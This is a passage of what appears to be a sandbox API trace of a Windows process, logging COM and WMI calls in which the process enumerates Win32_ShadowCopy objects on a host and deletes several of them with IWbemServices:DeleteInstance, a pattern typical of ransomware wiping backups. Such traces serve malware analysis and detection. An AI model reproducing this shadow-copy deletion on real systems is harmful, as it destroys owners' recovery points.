pType=0x1c90d0ac*=0, plFlavor=0x1c90d0a8*=0 | out: pVal=0x1c90d0b0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pType=0x1c90d0ac*=11, plFlavor=0x1c90d0a8*=0) returned 0x0 [0108.897] IWbemClassObject:Get (in: This=0x1be504e0, wszName="ForceDismount", lFlags=0, pVal=0x1c90d0c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d0bc*=11, plFlavor=0x1c90d0b8*=0 | out: pVal=0x1c90d0c0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pType=0x1c90d0bc*=11, plFlavor=0x1c90d0b8*=0) returned 0x0 [0109.041] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be46a00, puCount=0x1c90d370 | out: puCount=0x1c90d370*=0x2) returned 0x0 [0109.041] WbemDefPath:IWbemPath:GetText (in: This=0x1be46a00, lFlags=4, puBuffLength=0x1c90d370*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d370*=0x54, pszText=0x0) returned 0x0 [0109.042] WbemDefPath:IWbemPath:GetText (in: This=0x1be46a00, lFlags=4, puBuffLength=0x1c90d370*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d370*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"") returned 0x0 [0109.042] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d2c0 | out: puCount=0x1c90d2c0*=0x2) returned 0x0 [0109.042] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d2c0*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d2c0*=0x17, pszText=0x0) returned 0x0 [0109.042] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d2c0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d2c0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0109.042] CoGetContextToken (in: pToken=0x1c90d150 | out: pToken=0x1c90d150) returned 0x0 [0109.042] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x3 [0109.042] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cd20 | out: ppvObject=0x1c90cd20*=0x1b92e6f0) returned 0x0 [0109.042] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x3 [0109.042] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x2 [0109.043] IWbemClassObject:Get (in: This=0x1be44830, wszName="__GENUS", lFlags=0, pVal=0x1c90d2b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d2ac*=0, plFlavor=0x1c90d2a8*=0 | out: pVal=0x1c90d2b0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90d2ac*=3, plFlavor=0x1c90d2a8*=64) returned 0x0 [0109.043] WbemDefPath:IWbemPath:GetText (in: This=0x1be46a00, lFlags=2, puBuffLength=0x1c90d380*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d380*=0x3d, pszText=0x0) returned 0x0 [0109.043] WbemDefPath:IWbemPath:GetText (in: This=0x1be46a00, lFlags=2, puBuffLength=0x1c90d380*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d380*=0x3d, pszText="Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"") returned 0x0 [0109.043] IWbemServices:DeleteInstance (in: This=0x1be444f8, strObjectPath="Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0111.537] CoTaskMemAlloc (cb=0x8) returned 0x16a900 [0111.537] IEnumWbemClassObject:Next (in: This=0x1be44788, lTimeout=-1, uCount=0x1, apObjects=0x16a900, puReturned=0x1c90de18 | out: apObjects=0x16a900*=0x1be50d50, puReturned=0x1c90de18*=0x1) returned 0x0 [0111.539] IUnknown:QueryInterface (in: This=0x1be50d50, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d140 | out: ppvObject=0x1c90d140*=0x1be50d50) returned 0x0 [0111.539] IUnknown:QueryInterface (in: This=0x1be50d50, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90d1c0 | out: ppvObject=0x1c90d1c0*=0x0) returned 0x80004002 [0111.539] IUnknown:QueryInterface (in: This=0x1be50d50, riid=0x7fef2d6d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90cf58 | out: ppvObject=0x1c90cf58*=0x0) returned 0x80004002 [0111.539] IUnknown:AddRef (This=0x1be50d50) returned 0x3 [0111.540] CoGetContextToken (in: pToken=0x1c90ce10 | out: pToken=0x1c90ce10) returned 0x0 [0111.540] IUnknown:QueryInterface (in: This=0x1be50d50, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cdd0 | out: ppvObject=0x1c90cdd0*=0x1be50d58) returned 0x0 [0111.540] IMarshal:GetUnmarshalClass (in: This=0x1be50d58, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90ce00 | out: pCid=0x1c90ce00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0111.540] IUnknown:Release (This=0x1be50d58) returned 0x3 [0111.540] CoGetContextToken (in: pToken=0x1c90cde0 | out: pToken=0x1c90cde0) returned 0x0 [0111.540] IUnknown:AddRef (This=0x1be50d50) returned 0x4 [0111.540] IUnknown:QueryInterface (in: This=0x1be50d50, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cef8 | out: ppvObject=0x1c90cef8*=0x0) returned 0x80004002 [0111.541] IUnknown:Release (This=0x1be50d50) returned 0x3 [0111.541] IUnknown:Release (This=0x1be50d50) returned 0x2 [0111.541] CoGetContextToken (in: pToken=0x1c90d2a0 | out: pToken=0x1c90d2a0) returned 0x0 [0111.541] CoGetContextToken (in: pToken=0x1c90d1e0 | out: pToken=0x1c90d1e0) returned 0x0 [0111.541] IUnknown:AddRef (This=0x1be50d50) returned 0x3 [0111.541] IUnknown:QueryInterface (in: This=0x1be50d50, riid=0x1c90d320*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c90d300 | out: ppvObject=0x1c90d300*=0x1be50d50) returned 0x0 [0111.541] IUnknown:Release (This=0x1be50d50) returned 0x3 [0111.542] IUnknown:Release (This=0x1be50d50) returned 0x2 [0111.542] IUnknown:Release (This=0x1be50d50) returned 0x1 [0111.542] CoTaskMemFree (pv=0x16a900) [0111.542] CoGetContextToken (in: pToken=0x1c90dc20 | out: pToken=0x1c90dc20) returned 0x0 [0111.542] IUnknown:AddRef (This=0x1be50d50) returned 0x2 [0111.543] IWbemClassObject:Get (in: This=0x1be50d50, wszName="__GENUS", lFlags=0, pVal=0x1c90dd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd8c*=0, plFlavor=0x1c90dd88*=0 | out: pVal=0x1c90dd90*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90dd8c*=3, plFlavor=0x1c90dd88*=64) returned 0x0 [0111.543] IWbemClassObject:Get (in: This=0x1be50d50, wszName="__PATH", lFlags=0, pVal=0x1c90dd30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd2c*=0, plFlavor=0x1c90dd28*=0 | out: pVal=0x1c90dd30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"", varVal2=0x0), pType=0x1c90dd2c*=8, plFlavor=0x1c90dd28*=64) returned 0x0 [0111.543] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"") returned 0x53 [0111.543] CoGetObjectContext (in: riid=0x1c90dcc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90dcc0 | out: ppv=0x1c90dcc0*=0x142498) returned 0x0 [0111.543] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90dce0 | out: pAptType=0x1c90dce0*=1) returned 0x0 [0111.543] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90dde8 | out: ppvObject=0x1c90dde8*=0x0) returned 0x80004002 [0111.544] IUnknown:Release (This=0x142498) returned 0x1 [0111.545] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d350 | out: ppv=0x1c90d350*=0x1be41d40) returned 0x0 [0111.545] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be41d40, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90d060 | out: ppvObject=0x1c90d060*=0x0) returned 0x80004002 [0111.545] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be41d40, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d048 | out: ppvObject=0x1c90d048*=0x1be512e0) returned 0x0 [0111.546] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be512e0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cf50 | out: ppvObject=0x1c90cf50*=0x1be512e0) returned 0x0 [0111.546] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be512e0, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90cfd0 | out: ppvObject=0x1c90cfd0*=0x0) returned 0x80004002 [0111.547] WbemDefPath:IUnknown:AddRef (This=0x1be512e0) returned 0x3 [0111.547] CoGetContextToken (in: pToken=0x1c90cc20 | out: pToken=0x1c90cc20) returned 0x0 [0111.547] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be512e0, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cbe0 | out: ppvObject=0x1c90cbe0*=0x17c430) returned 0x0 [0111.547] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x17c430, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90cc10 | out: pCid=0x1c90cc10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0111.547] WbemDefPath:IUnknown:Release (This=0x17c430) returned 0x3 [0111.548] CoGetContextToken (in: pToken=0x1c90cbf0 | out: pToken=0x1c90cbf0) returned 0x0 [0111.548] WbemDefPath:IUnknown:AddRef (This=0x1be512e0) returned 0x4 [0111.548] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be512e0, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cd08 | out: ppvObject=0x1c90cd08*=0x0) returned 0x80004002 [0111.548] WbemDefPath:IUnknown:Release (This=0x1be512e0) returned 0x3 [0111.548] WbemDefPath:IUnknown:Release (This=0x1be512e0) returned 0x2 [0111.549] WbemDefPath:IUnknown:Release (This=0x1be41d40) returned 0x0 [0111.549] WbemDefPath:IUnknown:Release (This=0x1be512e0) returned 0x1 [0111.549] CoGetContextToken (in: pToken=0x1c90d920 | out: pToken=0x1c90d920) returned 0x0 [0111.549] CoGetContextToken (in: pToken=0x1c90d860 | out: pToken=0x1c90d860) returned 0x0 [0111.549] WbemDefPath:IUnknown:AddRef (This=0x1be512e0) returned 0x2 [0111.549] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be512e0, riid=0x1c90d9a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90d980 | out: ppvObject=0x1c90d980*=0x1be512e0) returned 0x0 [0111.549] WbemDefPath:IUnknown:Release (This=0x1be512e0) returned 0x2 [0111.549] WbemDefPath:IUnknown:Release (This=0x1be512e0) returned 0x1 [0111.549] CoGetContextToken (in: pToken=0x1c90daa0 | out: pToken=0x1c90daa0) returned 0x0 [0111.549] CoGetContextToken (in: pToken=0x1c90d9e0 | out: pToken=0x1c90d9e0) returned 0x0 [0111.549] WbemDefPath:IUnknown:AddRef (This=0x1be512e0) returned 0x2 [0111.549] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be512e0, riid=0x1c90db20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90db00 | out: ppvObject=0x1c90db00*=0x1be512e0) returned 0x0 [0111.550] WbemDefPath:IUnknown:Release (This=0x1be512e0) returned 0x2 [0111.550] WbemDefPath:IUnknown:AddRef (This=0x1be512e0) returned 0x3 [0111.550] WbemDefPath:IWbemPath:SetText (This=0x1be512e0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"") returned 0x0 [0111.550] WbemDefPath:IUnknown:Release (This=0x1be512e0) returned 0x2 [0111.550] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90dd60 | out: puCount=0x1c90dd60*=0x2) returned 0x0 [0111.550] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c90dd60*=0x17, pszText=0x0) returned 0x0 [0111.550] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90dd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0111.550] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0111.550] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0111.550] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0111.550] IWbemClassObject:Get (in: This=0x1be50d50, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0111.550] SysStringLen (param_1="root\\cimv2") returned 0xa [0111.551] IWbemClassObject:Get (in: This=0x1be50d50, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0111.551] SysStringLen (param_1="root\\cimv2") returned 0xa [0111.551] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0111.551] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0111.551] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0111.551] IWbemClassObject:Get (in: This=0x1be50d50, wszName="__CLASS", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0111.551] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0111.551] IWbemClassObject:Get (in: This=0x1be50d50, wszName="__CLASS", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0111.551] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0111.551] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be512e0, puCount=0x1c90d500 | out: puCount=0x1c90d500*=0x2) returned 0x0 [0111.551] WbemDefPath:IWbemPath:GetText (in: This=0x1be512e0, lFlags=4, puBuffLength=0x1c90d500*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d500*=0x54, pszText=0x0) returned 0x0 [0111.551] WbemDefPath:IWbemPath:GetText (in: This=0x1be512e0, lFlags=4, puBuffLength=0x1c90d500*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d500*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"") returned 0x0 [0111.551] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d450 | out: puCount=0x1c90d450*=0x2) returned 0x0 [0111.552] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d450*=0x17, pszText=0x0) returned 0x0 [0111.552] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d450*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0111.552] CoGetContextToken (in: pToken=0x1c90d2e0 | out: pToken=0x1c90d2e0) returned 0x0 [0111.552] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x3 [0111.552] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90ceb0 | out: ppvObject=0x1c90ceb0*=0x1b92e6f0) returned 0x0 [0111.552] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x3 [0111.552] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x2 [0111.552] IWbemClassObject:Get (in: This=0x1be50d50, wszName="__GENUS", lFlags=0, pVal=0x1c90d440*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d43c*=0, plFlavor=0x1c90d438*=0 | out: pVal=0x1c90d440*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90d43c*=3, plFlavor=0x1c90d438*=64) returned 0x0 [0111.553] WbemDefPath:IWbemPath:GetText (in: This=0x1be512e0, lFlags=2, puBuffLength=0x1c90d510*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d510*=0x3d, pszText=0x0) returned 0x0 [0111.553] WbemDefPath:IWbemPath:GetText (in: This=0x1be512e0, lFlags=2, puBuffLength=0x1c90d510*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d510*=0x3d, pszText="Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"") returned 0x0 [0111.553] IWbemServices:DeleteInstance (in: This=0x1be444f8, strObjectPath="Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0114.434] CoTaskMemAlloc (cb=0x8) returned 0x16a900 [0114.435] IEnumWbemClassObject:Next (in: This=0x1be44788, lTimeout=-1, uCount=0x1, apObjects=0x16a900, puReturned=0x1c90de18 | out: apObjects=0x16a900*=0x1be514d0, puReturned=0x1c90de18*=0x1) returned 0x0 [0114.437] IUnknown:QueryInterface (in: This=0x1be514d0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d140 | out: ppvObject=0x1c90d140*=0x1be514d0) returned 0x0 [0114.438] IUnknown:QueryInterface (in: This=0x1be514d0, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90d1c0 | out: ppvObject=0x1c90d1c0*=0x0) returned 0x80004002 [0114.438] IUnknown:QueryInterface (in: This=0x1be514d0, riid=0x7fef2d6d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90cf58 | out: ppvObject=0x1c90cf58*=0x0) returned 0x80004002 [0114.439] IUnknown:AddRef (This=0x1be514d0) returned 0x3 [0114.439] CoGetContextToken (in: pToken=0x1c90ce10 | out: pToken=0x1c90ce10) returned 0x0 [0114.439] IUnknown:QueryInterface (in: This=0x1be514d0, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cdd0 | out: ppvObject=0x1c90cdd0*=0x1be514d8) returned 0x0 [0114.440] IMarshal:GetUnmarshalClass (in: This=0x1be514d8, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90ce00 | out: pCid=0x1c90ce00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0114.440] IUnknown:Release (This=0x1be514d8) returned 0x3 [0114.440] CoGetContextToken (in: pToken=0x1c90cde0 | out: pToken=0x1c90cde0) returned 0x0 [0114.440] IUnknown:AddRef (This=0x1be514d0) returned 0x4 [0114.440] IUnknown:QueryInterface (in: This=0x1be514d0, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cef8 | out: ppvObject=0x1c90cef8*=0x0) returned 0x80004002 [0114.440] IUnknown:Release (This=0x1be514d0) returned 0x3 [0114.441] IUnknown:Release (This=0x1be514d0) returned 0x2 [0114.441] CoGetContextToken (in: pToken=0x1c90d2a0 | out: pToken=0x1c90d2a0) returned 0x0 [0114.442] CoGetContextToken (in: pToken=0x1c90d1e0 | out: pToken=0x1c90d1e0) returned 0x0 [0114.442] IUnknown:AddRef (This=0x1be514d0) returned 0x3 [0114.442] IUnknown:QueryInterface (in: This=0x1be514d0, riid=0x1c90d320*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c90d300 | out: ppvObject=0x1c90d300*=0x1be514d0) returned 0x0 [0114.442] IUnknown:Release (This=0x1be514d0) returned 0x3 [0114.442] IUnknown:Release (This=0x1be514d0) returned 0x2 [0114.442] IUnknown:Release (This=0x1be514d0) returned 0x1 